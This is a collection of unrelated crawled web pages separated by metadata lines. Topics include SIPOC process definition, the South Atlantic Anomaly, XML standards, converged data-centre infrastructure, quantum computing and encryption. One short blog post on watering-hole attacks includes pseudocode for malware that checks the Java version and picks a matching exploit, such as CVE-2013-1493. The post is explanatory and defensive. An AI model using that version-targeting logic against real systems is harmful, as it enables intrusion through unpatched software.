The project -- described in a research paper presented at the 2009 International Conference on Computer Vision in Kyoto, Japan -- pioneered a method for solving large-scale distributed computer vision problems.
GRAIL researchers developed a new system that uses parallel processing to rapidly match the huge number of individual images that were needed to create the detailed 3-D rendering.
Electronic Weatherproof Protection
Government agencies that spend millions of dollars replacing weather-damaged equipment can sigh with relief, thanks to a new coating process called Golden Shellback, developed by the Northeast Maritime Institute. The coating produces a vacuum deposited film that's nonflammable, has low toxicity and can make electronic devices and other surfaces splash-proof. The process is specifically designed to protect devices commonly used in marine and hazardous environments against damage caused by exposure to moisture, immersion in water, dust, effects of high wind and chemicals. -- Northeast Maritime Institute | <urn:uuid:1338051d-a73c-44b5-b250-c8bf907ba458> | CC-MAIN-2017-04 | http://www.govtech.com/e-government/IT-Trends-Weatherproofing-Electronic-Devices-3-D.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93187 | 255 | 2.890625 | 3 |
Using SIPOC to Define ITIL® Processes
This white paper describes a technique for defining processes called SIPOC (Suppliers, Inputs, Process, Outputs, and Customers). SIPOC provides a structured way to define the key elements of any process. SIPOC can be used as a means of defining any of the service management processes presented in ITIL® best practices. Furthermore, SIPOC can be used as the preliminary input into the more formal documentation of a process in one of many process design tools.
In this white paper, the process definition using SIPOC is described. SIPOC is a tool often associated with SixSigma and other quality improvement activities that are used to define the key elements of a process. SIPOC stands for:
- Process Steps
SIPOC provides a structured method for defining a high-level overview of any process that is focused on the results that the customers of the process receive.
Various Information Technology Infrastructure Library (ITIL®) processes can be defined using SIPOC. In this white paper, we use a simple example that describes definition of a change management process based on ITIL best practices.
This white paper concludes with a brief discussion of next steps once a SIPOC table is completed for a process, specifically, using the information in a SIPOC table to formally document a process in a tool such as Microsoft Visio or IBM WebSphere Business Modeler.
What is SIPOC?
Process definition and improvement efforts often make slow progress because of lack of an adequate tool to show the high-level elements of a process, and how those elements relate to each other. SIPOC is a tool that can be used to define the key elements of a process, as well as how those elements interact with each other. SIPOC provides a visual, end-to-end representation of a process.
SIPOC is an acronym that stands for:
Suppliers: Suppliers are internal or external entities that produce something such as a good, service, or information that is consumed as an input by the process. A process can have one or more suppliers.
Inputs: Inputs are discrete items such as a goods, services, or information that are consumed by the process. Processes can have one or more inputs.
Process Steps: Process Steps are the structured and specific activities that transform a process's inputs into one or more defined outputs. A process can have one or more steps.
Outputs: Outputs are the intended and actual results of the process. Outputs can include goods, services, information, or other specific units. A process can have one or more outputs.
Customers: Customers are the internal or external entities that receive the value of a process by consuming one or more of its outputs. A process can have one or more customers.
The origin of SIPOC is somewhat of a mystery. There is some evidence that it is related to or based on Deming's system diagram. Additionally, the SIPOC approach is somewhat similar to the input-process-output pattern used in systems analysis and design. Despite all of these links, there is little clear evidence that points to the origin of SIPOC.
Benefits of SIPOC
SIPOC provides an easy-to-learn method of providing a high-level view of a process and its key elements.
Some specific benefits include the following:
- SIPOC provides a way for people who are unfamiliar with a process and the elements of a process to quickly develop a high-level understanding.
- SIPOC also can be used as a way to help people maintain familiarity with a process over time.
- SIPOC often is used in the definition of new processes because it provides an easy-to-use way of organizing and viewing the key aspects of a process. It other words, SIPOC provides an easy-to-use "starting point" for process definition.
- SIPOC helps people understand all of the inputs consumed by a process, as well as all of the outputs created by a process, including those outputs that aren't necessarily desirable.
- SIPOC can be used to document the current state of a process, as well as the desired or future state of a process.
Many process definition and reengineering efforts struggle to get started because of information overload about processes in use. SIPOC helps organizations overcome this information overload roadblock by specifically focusing process definition on its five key elements. | <urn:uuid:88ba2ecd-a026-483e-8064-5f6ecd5d3e24> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/using-sipoc-to-define-itil-processes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00350-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933289 | 929 | 3.09375 | 3 |
Definition: A shared memory model of computation, where typically the processors all execute the same instruction synchronously, and access to any memory location occurs in unit time.
Also known as PRAM.
Aggregate child (... is a part of or used in me.)
See also work-depth model, multiprocessor model.
Note: From Algorithms and Theory of Computation Handbook, page 47-3, Copyright © 1999 by CRC Press LLC. Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 27 February 2004.
HTML page formatted Mon Feb 2 13:10:40 2015.
Cite this as:
Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "parallel random-access machine", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 27 February 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/parallelRandomAccessMachine.html | <urn:uuid:aad9652b-4e92-4780-930c-92092fd3d7cc> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/parallelRandomAccessMachine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00194-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.814639 | 247 | 2.546875 | 3 |
Space sometimes looks as twilight zone to us, but we do not have to go that far to find one. The radiation belts are regions of high-energy particles, mainly protons and electrons, held captive by the magnetic influence of the Earth. They have two main sources. A small but very intense "inner belt" (some call it "The Van Allen Belt" because it was discovered in 1958 by James Van Allen) is trapped within 6500 km or so of the Earth's surface. It consists mainly a high-energy protons (10-50 MeV) and is a by-product of the cosmic radiation, a thin drizzle of very fast protons and nuclei which fill all our galaxy. In addition there exist electrons and protons (and also oxygen particles from the upper atmosphere) given moderate energies (say 1-100 keV) by processes inside the domain of the Earth's magnetic field. Some of these electrons produce the polar aurora ("northern lights") when they hit the upper atmosphere, but many get trapped, and among those, protons and positive particles have most of the energy .
Another point of particular interest to high-energy astrophysics is the South Atlantic Anomaly (SAA).We all know that the Earth's magnetic axis is not the same as its rotational axis. As the Earth's molten, ferromagnetic liquid core churns, it generates a magnetic field, and the north-south axis of this field is tilted about 16° from the rotational axis. The north magnetic pole is in the north Canadian islands, but it moves around a lot, and it's currently headed northwest at about 64 km per year. Here's the part that many people don't know. While the north magnetic pole is about 7° from the north rotational pole, the south magnetic pole is about 25° from the south rotational pole. A line drawn from the north magnetic pole to the south does not pass through the center of the Earth. Our magnetic field is torus shaped, like a giant donut around the earth. But it's not only tilted, it's also pulled to one side, such that one inner surface of the donut is more squished up against the side of the earth than the other. It's this offset that causes the South Atlantic Anomaly to be at just one spot on the Earth. This is a region of very high particle flux about 250 km above the Atlantic Ocean off the coast of Brazil and is a result of the fact that the Earth's rotational and magnetic axes are not aligned. The particle flux is so high in this region that often the detectors on our satellites must be shut off (or at least placed in a "safe" mode) to protect them from the radiation. Below is a map of the SAA at an altitude of around 560 km. The map was produced ROSAT by monitoring the presence of charged particles. The dark red area shows the extent of the SAA. The green to yellow to orange areas show Earth's particle belts.
The South Atlantic Anomaly comes about because the Earth's field is not completely symmetric. If we were to represent it by a compact magnet (which reproduces the main effect, not the local wiggles), that magnet would not be at the center of the Earth but a few hundred km away, in the direction away from the "anomaly". Thus the anomaly is the region most distant from the "source magnet" and its magnetic field (at any given height) is thus relatively weak. The reason trapped particles don't reach the atmosphere is that they are repelled (sort of) by strong magnetic fields, and the weak field in the anomaly allows them to reach further down than elsewhere.
The shape of this anomaly changes over time. Since its initial discovery in 1958] the southern limits of the SAA have remained roughly constant while a long-term expansion has been measured to the northwest, the north, the northeast, and the east. Additionally, the shape and particle density of the anomaly varies on a diurnal basis, with greatest particle density corresponding roughly to local noon. At an altitude of approximately 500 km, it spans from -50° to 0° geographic latitude and from -90° to +40° longitude. The highest intensity portion of the SAA drifts to the west at a speed of about 0.3 degrees per year. The drift rate is very close to the rotation differential between the Earth's core and its surface, estimated to be between 0.3 and 0.5 degrees per year. Current literature suggests that a slow weakening of the geomagnetic field is one of several causes for the changes in the borders since its discovery. As the geomagnetic field continues to weaken, the inner Van Allen belt gets closer to the Earth, with a commensurate enlargement of the anomaly at given altitudes.
Now, what are the effects of this monster? The South Atlantic Anomaly is of great significance to astronomical satellites and other spacecraft that orbit the Earth at several hundred kilometers altitude; these orbits take satellites through the anomaly periodically, exposing them to several minutes of strong radiation, caused by the trapped protons in the inner Van Allen belt. The ISS, orbiting with an inclination of 51.6°, requires extra shielding to deal with this problem. The Hubble Space Telescope does not take observations while passing through this anomaly. Astronauts are also affected by this region which is said to be the cause of peculiar 'shooting stars' (phosphenes) seen in the visual field of astronauts. One of the current ISS astrounaouts, Don Pettit, describes this effects in his blog. The eye retina is an amazing structure - it’s more impressive than film or a CCD camera chip, and it reacts to more than just light. It also reacts to cosmic rays, which are plentiful in space. When a cosmic ray happens to pass through the retina it causes the rods and cones to fire, and you perceive a flash of light that is really not there. The triggered cells are localized around the spot where the cosmic ray passes, so the flash has some structure. A perpendicular ray appears as a fuzzy dot. A ray at an angle appears as a segmented line. Sometimes the tracks have side branches, giving the impression of an electric spark. The rate or frequency at which these flashes are seen varies with orbital position, Don continues to say. When passing through anomaly, where the flux of cosmic rays is 10 to 100 times greater than the rest of the orbital path, eye flashes will increase from one or two every 10 minutes to several per minute.
Passing through the South Atlantic Anomaly is thought to be the reason for the early failures of the Globalstar network's satellites. The PAMELA experiment, while passing through this anomaly, detected antiproton levels that were orders of magnitude higher than those expected from normal particle decay. This suggests the Van Allen belt confines antiparticles produced by the interaction of the Earth's upper atmosphere with cosmic rays. NASA has reported that modern laptops have crashed when the space shuttle flights passed through the anomaly and Don has confirmed that since in his blog adding cameras suffer too. During the Apollo missions, astronauts saw these flashes after their eyes had become dark-adapted. When it was dark, they reported a flash every 2.9 minutes on average. Only one Apollo crew member involved in the experiments did not report seeing the phenomenon, Apollo 16′s Command Module Pilot Ken Mattingly, who stated that he had poor night vision.
There are experiments on board the ISS to monitor how much radiation the crew is receiving. One experiment is the Phantom Torso, a mummy-looking mock-up of the human body which determines the distribution of radiation doses inside the human body at various tissues and organs.
There’s also the Alpha Magnetic Spectrometer experiment, a particle physics experiment module that is mounted on the ISS. It is designed to search for various types of unusual matter by measuring cosmic rays, and hopefully will also tell us more about the origins of both those crazy flashes seen in space, and also the origins of the Universe.
We know that the South Atlantic Anomaly is hazardous to electronic equipment and to humans who spend time inside it. We know that it dips down close to the Earth. Although the Anomaly is a dangerous place, its edges are pretty well defined. The closest it ever gets to the Earth's surface is about 200 km, and at that height it's very small. Your commercial airplane won't reach that altitude for sure. And with everything we know today about it, it is hardly a twilight zone either.
Credits: NASA, Wikpedia, Don Pettit, Astrobiology Magazine, Brian Dunning | <urn:uuid:95b2f1dc-e1cf-45b2-b2fd-93ce620ad2a2> | CC-MAIN-2017-04 | https://community.emc.com/people/ble/blog/2012/04/29/south-atlantic-anomaly | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00404-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954669 | 1,771 | 3.953125 | 4 |
Encryption isn’t new, but it is gaining new momentum. Used for decades in the financial and defense industries, encryption is on the rise again due in part to recent privacy concerns, aggressive data breaches, and laws regarding the disclosure of those breaches. Organizations from small to large are now seeing encryption technology not just as a nice-to-have but as a must-have.
Encryption has historically been used very narrowly to protect specific kinds of data. Now, though, it is being more ubiquitously deployed. For example, Google and other major email service providers are now encrypting email for their users. Online retailers could not stay in business without encryption. The proliferation of mobile devices has expanded attack surfaces, requiring enterprises to use encryption within their Internet IT systems.
As a multitude of encryption tools are deployed to protect a wide variety of data, these tools tend to create security silos. While a silo is better than no security, it creates added complexity to the security landscape and increases the risk of inconsistency and fragmentation — otherwise known as “encryption sprawl.” The growing popularity of cloud services only deepens the problem. If encryption were standardized, this would not be an issue. Though there are a few widely used encryption algorithms like RSA and AES, the silo effect remains. It’s important to understand what is available and what your organization requires in terms of data security to ensure an encryption strategy that offers the maximum in data protection.
Please log in or register below to read the full article. | <urn:uuid:419bf825-51b8-46ba-91a9-1cf78afd4e2c> | CC-MAIN-2017-04 | http://www.bsminfo.com/doc/how-to-combat-encryption-sprawl-0001 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00038-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944527 | 312 | 2.671875 | 3 |
In case you haven’t heard, a new attack vector is a “watering hole” attack. In the real world, you might think of a watering hole attack as one in which a lion waits nearby for other animals to visit a pond for a drink. As a technical attack, it’s not much different. The attacker sets traps on sites that are frequented by individuals/organizations. Once the victim visits the site, the attack is launched.
As an example, some Apple employees were hacked after visiting a developer web site that exploited a vulnerability in the Java browser plug-in, installing malware on their Mac computers. Watering hole attackers can use various techniques to trap their victims. One such technique is designing the malware to look for multiple vulnerabilities:
if version > Java6 Update 32 or if version > Java7 Update 10, then
exploit the newest vulnerability CVE-2013-1493.
else if Java 7 (version <= Java 7 Update 10) then
else (version < Java 6 Update 32) then
Notice how the malicious applet checks for the version of JRE and then targets a specific vulnerable version. Attackers use this technique because exploits that may work for one version of vulnerable software may not be effective for another.
To prevent these types of attacks users should make sure their software up to date and keep anti-malware software current. Also, more companies are now starting to look at using secured isolated virtual machines and running a web browser in an isolated virtual environment can be used to limit the capability of the malware to spread. As with other attacks a good defense requires an in depth approach that builds in multiple layers of protection. | <urn:uuid:459b0f40-587c-428f-add2-3641b3e5ab0e> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2013/04/18/watering-holes-attacks-on-the-rise/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00432-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90224 | 342 | 2.96875 | 3 |
|XML Products||XML Standards by Category|
Below is a list of community-related XML standards, in alphabetical order.
Atom - An XML Syndication Format, alternative to RSS
The name Atom applies to a pair of related standards: the Atom Syndication Format is an XML language used for web feeds, while the Atom Publishing Protocol (short AtomPub or APP) is a simple HTTP-based protocol for creating and updating web resources. See also this Atom introduction.
DITA - Darwin Information Typing Architecture
DITA is an XML architecture for designing, writing, managing, and publishing information. DITA is used by EMC Technical Publication groups for product documentation.
DocBook - an XML Document Language Format
DocBook is an XML architecture for writing, managing and publishing information. DocBook is used by EMC Technical Publication groups for product documentation.
DOM - Document Object Model
DOM is a platform- and language-neutral interface that allows programs and scripts to dynamically access and update the content, structure and style of documents.
HR-XML - a collection of schemas for the exchange of data between HR systems.
KML - Keyhole Markup Language
KML is used for displaying data on maps using Google Earth, Google Maps or Microsoft Visual Earth. Very useful for plotting EMC office locations and staffing levels
ODF - Open Document Format.
The OpenDocument Format (ODF) is an open XML-based document file format for office applications to be used for documents containing text, spreadsheets, charts, and graphical elements.
OOXML - Office Open XML
The XML format for word processing, spreadsheets and presentations advocated by Microsoft..
- RSS - Really Simple Syndication
RSS is a family of web content syndication formats, with the latest being RSS 2.0. See also Atom.
S1000D - An international specification for the procurement and production of technical publications
S1000D is an international standard for technical publishing, utilising a Common Source Database.
The CORENA suite by EMC partner Flatirons supports s1000D.
EMC Documentum Dynamic Delivery Services offers an S1000D Logic Engine.
SAML - Security Assertion Markup Language.
An XML-based framework for communicating user authentication, entitlement, and attribute information, developed by OASIS.
SAX - Simple API for XML.
SAX is a widely adopted API for XML in Java and some other languages.
- - Context based schema validation
XML based schema language that uses XPath in order to provide constraints upon values in a given XML instance.
- SOAP - Simple Object Access Protocol
Protocol for exchanging structured and typed information between peers in a decentralized, distributed environment. SOAP is a core part of the web services technology stack.
SVG - ScalableVector Graphics
SVG is a language for describing two-dimensional graphics and graphical applications in XML.
- - Text Encoding Initiative
TEI is a set of XML standards used to mark up and annotate literature documents such as plays or speeches.
- WSDL - Web Services Description Language
WDSL is a core part of the web services technology stack.
XAML - eXtensible Application Markup Language.
A core Microsoft technology for describing the layout and composition of User Interfaces. Used by WPF (Windows Presentation Foundation) and WPF/E (WPF/Everywhere or Silverlight) - the light weight, cross-platform version of WPF for rich web-based applications.
XBRL - eXtensible Business Reporting Language
XBRLis a language for the electronic communication of business and financial data which is revolutionizing business reporting around the world. See also XBRL at EMC.
XForms - the next generation of forms technology for the world wide web
XForms is an XML application that represents the next generation of forms for the Web. XForms is not a free-standing document type, but is intended to be integrated into other markup languages, such as XHTML, ODF or SVG. An XForms-based web form gathers and processes XML data using an architecture that separates presentation, purpose and content.
XHTML - The Extensible HyperText Markup Language
XHTML is a family of current and future document types and modules that reproduce, subset, and extend HTML, reformulated in XML.
XML Infoset - XML Information Set
The purpose of this specification is to provide a consistent set of definitions for use in other specifications that need to refer to the information in a well-formed XML document.
XML Schema - the W3C XML Schema Language
XML Schemas define the structure of XML documents.
XML/A - XML for Analysis
A standard that allows client applications to talk to multi-dimensional or OLAP data sources. The communication of messages back and forth is done using web standards - HTTP, SOAP, and XML. The query language used is MDX, which is the most commonly used multi-dimensional expression language today. Hyperion's Essbase, Microsoft's Analysis Services, and SAP's Business Warehouse all support the MDX language and the XMLA specification. Oracle is the only major OLAP vendor not supporting XML/A.
XPath is a language for searching and navigation in an XML document. XQuery and XPointer are both built on XPath expressions.
XProc - an XML Pipeline Language
XProc is a language for describing operations to be performed on XML documents.
XQuery - an XML query language
XML is a versatile markup language, capable of labeling the information content of diverse data sources including structured and semi-structured documents, relational databases, and object repositories. A query language that uses the structure of XML intelligently can express queries across all these kinds of data, whether physically stored in XML or viewed as XML via middleware.
XRX - XForms/REST/XQuery web application architecture
XSLT - eXtensible Stylesheet Language for Transformations
XSLT a language for transforming XML documents into other XML documents (or other text formats, like HTML). | <urn:uuid:9995a9c2-7154-4925-9caf-2f647897e625> | CC-MAIN-2017-04 | https://community.emc.com/docs/DOC-3251 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00340-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.814292 | 1,284 | 2.59375 | 3 |
Get your head around the concepts and problems of unified computing.
Since joining Egenera, I've been championing what's now being termed Converged Infrastructure (aka unified computing). It's an exciting and important part of IT management, demonstrated by the fact that all major vendors are offering some form of the technology. But it sometimes takes a while for folks (my analyst friends included) to get their heads around understanding it.
PART 1: What is Converged Infrastructure, and how it will change data centre management
Converged Infrastructure and Unified Computing are both terms referring to technology where the complete server profile, including I/O (NICs, HBAs, KVM), networking (VLANs, IP load balancing), and storage connectivity (LUN mapping, switch control) are all abstracted and defined/configured in software. The result is a pooling of physical servers, network resources and storage resources that can be assigned on-demand. This approach lets IT operators rapidly re-purpose servers or entire environments without having to physically reconfigure I/O components by hand, and without the requirement of hypervisors. It massively reduces the quantity and expense of the physical I/O and networking components as well as the time required to configure them. A converged infrastructure approach offers an elegant, simple-to-manage approach to data centre infrastructure administration.
From an architectural perspective, this approach may also be referred to as a compute fabric or Processing Area Network. Because the physical CPU state is completely abstracted away, the CPUs become stateless and therefore can be reassigned extremely easily creating a fabric of components, analogous to how SANs assign logical storage LUNs. Through I/O virtualisation, both data and storage transports can also be converged, further simplifying the physical network infrastructure down to a single wire.
The result is a wire-once set of pooled bare-metal CPUs and network resources that can be assigned on demand, defining their logical configurations and network connections instantly.
There is another nice resource: A whitepaper commissioned by HP, executed by Michelle Bailey at IDC. In it she defines a converged system:
The term converged system refers to a new set of enterprise products that package server, storage, and networking architectures together as a single unit and utilise built-in service-oriented management tools for the purpose of driving efficiencies in time to deployment and simplifying ongoing operations. Within a converged system, each of the compute, storage, and network devices are aware of each other and are tuned for higher performance than if constructed in a purely modular architecture. While a converged system may be constructed of modular components that can be swapped in and out as scaling requires, ultimately the entire system is integrated at either the hardware layer or the software layer.
A Converged Infrastructure is different from, but analogous to, hypervisor-based server virtualisation. Think of hypervisors as operating above the CPU, abstracting software (applications and O/S) from the CPU; think of a Converged Infrastructure as operating below the CPU, abstracting network and storage connections. However, note that converged Infrastructure doesn't operate via a software layer the way that a hypervisor does. Converged Infrastructure is possible whether or not server virtualisation is present.
Converged Infrastructure and server virtualisation can complement each other producing significant cost and operational benefits. For example, consider a physical host failure where the entire machine, network and storage configuration needs to be replicated on a new physical server. Using Converged Infrastructure, IT Ops can quickly replace the physical server using a spare bare-metal server. A new host can be created on the fly, all the way down to the same NIC, HBA and networking configurations of the original server.
A Converged Infrastructure can re-create a physical server (or virtual host) as well as its networking and storage configuration on any cold bare-metal server. In addition, it can re-create an entire environment of servers using bare-metal infrastructure at a different location as well. Thus it is particularly well-suited to provide both high-availability (HA) as well as Disaster Recovery (DR) in mixed physical/virtual environments, eliminating the need for complex clustering solutions. In doing so, a single Converged Infrastructure system can replace numerous point-products for physical/virtual
server management, network management, I/O management, configuration management, HA and DR.
- Simplifying Management for The other half of the Data centre
In the manner that server virtualisation has grown to become the dominant data centre management approach for software, converged infrastructure is poised to become the dominant management approach for the other 50 percent of the data centre its infrastructure.
However adoption will take place gradually, for a few reasons:
IT can only absorb so much at once. Most often, converged infrastructure is consumed after IT has come up the maturity curve after having cut their teeth on OS virtualisation. Once that initiative is under way, IT then begins looking for other sources of cost take-out... and the data centre infrastructure is the logical next step.
Converged infrastructure is still relatively new. While the market considers OS virtualisation to be relatively mature, converging infrastructure is less-well understood.
But there is one universal approach that can overcome these hesitations -- money. So, in my next installment, I'll do a deeper dive into the really fantastic economics and cost take-out opportunities of converging infrastructure...
PART 2. Converged Infrastructures Cost Advantages
Let me go a bit deeper and explain the source of capital and operational improvements converged Infrastructure offers and why its such a compelling opportunity to pursue.
First, the most important distinction to make between converged infrastructure and the old way of doing business is that management as well as the technology is also converged. Consider how many point- products you currently use for infrastructure management.
This diagram below has resonated with customers and analysts alike. It highlights, albeit in a stylised fashion, just how many point-products an average-sized IT department is using. This results in clear impact in
- Operational complexity coordinating tool use, procedures, interdependencies and fault-tracking
- Operational cost the raw expense it costs to acquire and then annually maintain them
- Capital cost if you count all of the separate hardware components theyre trying to manage
That last bullet, the thing about hardware components, is also something to drill down into. Because every physical infrastructure component in the old way of doing things has a cost. I mean I/O components like NICs and HBAs, not to mention switches, load balancers and cables.
What might be possible if you could virtualise all of the physical infrastructure components, and then have a single tool to manipulate them logically?
Well, then youd be able to throw-out roughly 80 percent of the physical components (and the associated costs) and reduce the operational complexity roughly the same amount.
In the same way that the software domain has been virtualised by the hypervisor, the infrastructure world can be virtualised with I/O virtualisation and converged networking. Once the I/O and network are now virtualised, they can be composed/recomposed on demand. This eliminates a large number of components needed for infrastructure provisioning, scaling, and even failover/clustering (more on this later). If you can now logically redefine server and infrastructure profiles, you can also create simplifed disaster recovery tools too.
In all, we can go from roughly a dozen point-products down to just 2-3 (see diagram below). Now: Whats the impact on costs?
On the capital cost side, since I/O is consolidated, it literally means fewer NICs and elimination of most HBAs since they can be virtualised too. Consolidating I/O also implies converged transport, meaning fewer cables (typically only 1 per server, 2 if teamed/redundant). A converged transport also allows for fewer switches needed on the network. Also remember that with few moving (physical) parts, you also have to purchase few software tools and licenses. See diagram on facing page.
On the operational cost side, there are the benefits of simpler management, less on-the-floor maintenance, and even less power consumption. With fewer physical components and a more virtual infrastructure, entire server configurations can be created more simply, often with only a single management tool. That means creating and assigning NICs, HBAs, ports, addresses and world-wide names. It means creating segregated VLAN networks, creating and assigning data and storage switches. And it means automatically creating and assigning boot LUNs. The server configuration is just what youre used to except its defined in software, and all from a single unified management console. The result: Buying, integrating and maintaining less software.
Ever wonder why converged infrastructure is developing such a following? Its because physical simplicity breeds operational efficiency. And that means much less sustained cost and effort. And an easier time at your job.
PART 3: Converged Infrastructure: What it Is, and What it Isn't
In my two earlier posts, I first took a stab at an overview of converged infrastructure and how it will change IT management, and in the second installment, I looked a bit closer at converged infrastructure's cost advantages. But one thing that I sense I neglected was to define what's meant by converged infrastructure (BTW, Cisco terms it Unified Computing). Even more important, I also feel the need to highlight what converged infrastructure is not. Plus, there are vendor instances where The Emperor Has No Clothing -- e.g. where some marketers have claimed that they suddenly have converged infrastructure where the fact remains that they are vending the same old products. Why splitting hairs in defining terms? Because true converged infrastructure / unified computing has architectural, operational, and capital cost advantages over traditional IT approaches. (AKA Don't buy the used car just because the paint is nice)
Defining terms - in the public domain Obviously, it can't hurt to see how the vendors self-describe the offerings... here goes: Cisco's Definition (via webopedia) "...simplifies traditional architectures and dramatically reduce the number of devices that must be purchased, cabled, configured, powered, cooled, and secured in the data centre. The Cisco Unified Computing System is a next-generation data centre platform that unites compute, network, storage access, and virtualisation into a cohesive system..."
Egenera's Definition "A technology where CPU allocation, data I/O, storage I/O, network configurations, and storage connections are all logically defined and configured in software. This approach allows IT operators to rapidly re-purpose CPUs without having to physically reconfigure each of the I/O components and associated network by handand without needing a hypervisor."
HP's Definition "HP Converged Infrastructure is built on a next-generation IT architecture based on standards that combines virtualised compute, storage and networks with facilities into a single shared-services environment optimised for any workload."
Defining terms - by using attributes Empirically, converged infrastructure needs to have two main attributes (to live up to its name): It should reduce the quantity and complexity of physical IT infrastructure, and it should reduce the quantity and complexity of IT operations management tools. So let's be specific:
Ability to reduce quantity and complexity of physical infrastructure:
- virtualise I/O, reducing physical I/O components (e.g. eliminate NICs and HBAs)
- leverage converged networking, reducing physical cabling and eliminating recabling
- reduce overall quantity of servers, (e.g. ability to use free pools of servers to repurpose for scaling, failure, disaster recovery, etc.)
- Ability to reduce quantity and complexity of operations/management tools:
- be agnostic with respect to the software payload (e.g. O/S independent)
- fewer point-products, less paging between tool windows (BTW, this is possible because so much of the infrastructure become virtual and therefore more easily logically manipulated)
- reduce/eliminate the silos of visualising & managing physical vs virtual servers, physical networks vs virtual networks
- simplified higher-level services, such as providing fail-over, scaling-out, replication, disaster recovery, etc.
To sum-up so far, if you're shopping for this stuff, you need to
a) Look for the ability to virtualise infrastructure as well as software
b) Look for fewer point products and less windowing
c) Look for more services (e.g. HA, DR) baked-into the product.
Beware.... when the Emperor Has No Clothes...
In closing, I'll also share my pet peeve: When vendors whitewash their products to ft the latest trend. I'll not name names, but beware of the following stuff labeled converged infrastructure:
- If the vendor says Heterogeneous Automation - that's different. For example, it could easily be scripted run-book automation. This doesn't reduce physical complexity in the least.
- If the vendor says Product Bundle, single SKU - Same as above. Shrink wrapped does not equal converged
- If the vendor says Pre-Integrated - This may simplify installation, but does not guarantee physical simplicity nor operational simplicity.
Thanks for reading the series so far. I'm pondering a fourth-and-final installment on where this whole virtualisation and converged infrastructure thing is taking us - a look at possible future directions.
Ken Oestreich is a marketing and product management veteran in the enterprise IT and data centre space, with a career spanning start-ups to established vendors.Ken currently works as Vice President - Product Marketing at Egenera.
This article is published with prior permission | <urn:uuid:993dc1dd-c158-4cb9-adcf-102c244544dc> | CC-MAIN-2017-04 | http://www.cioandleader.com/articles/7505/converged-infrastructure | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00184-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922998 | 2,855 | 2.515625 | 3 |
7.17 What is quantum computing?
Quantum computing [Ben82] [Fey82] [Fey86] [Deu92] is a new field in computer science that has been developed with our increased understanding of quantum mechanics. It holds the key to computers that are exponentially faster than conventional computers (for certain problems). A quantum computer is based on the idea of a quantum bit or qubit. In classical computers, a bit has a discrete range and can represent either a zero state or a one state. A qubit can be in a linear superposition of the two states. Hence, when a qubit is measured the result will be zero with a certain probability and one with the complementary probability. A quantum register consists of n qubits. Because of superposition, a phenomenon known as quantum parallelism allows exponentially many computations to take place simultaneously, thus vastly increasing the speed of computation.
Quantum interference, the analog of Young's double-slit experiment that demonstrated constructive and destructive interference phenomena of light, is one of the most significant characteristics of quantum computing. Quantum interference improves the probability of obtaining a desired result by constructive interference and diminishes the probability of obtaining an erroneous result by destructive interference.Thus, among the exponentially many computations, the correct answer can theoretically be identified with appropriate quantum ``algorithms.''
It has been proven [Sho94] that a quantum computer will be able to factor (see Question 2.3.3) and compute discrete logarithms (see Question 2.3.7) in polynomial time. Unfortunately, the development of a practical quantum computer still seems far away because of a phenomenon called quantum decoherence, which is due to the influence of the outside environment on the quantum computer. Brassard has written a number of helpful texts in this field [Bra95a] [Bra95b] [Bra95c].
Quantum cryptography (see Question 7.18) is quite different from, and currently more viable than, quantum computing.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- <>b7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:cbfc8796-713f-4625-93df-751b423ba8d0> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-quantum-computing.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00213-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.914936 | 712 | 3.796875 | 4 |
NASA aims to build real tractor beams
- By Greg Crowe
- Nov 03, 2011
The latest installment in my series that I am now calling “Holy Crap, Science Fiction is Finally Here!” involves NASA’s announcement that they will be working on tractor beams.
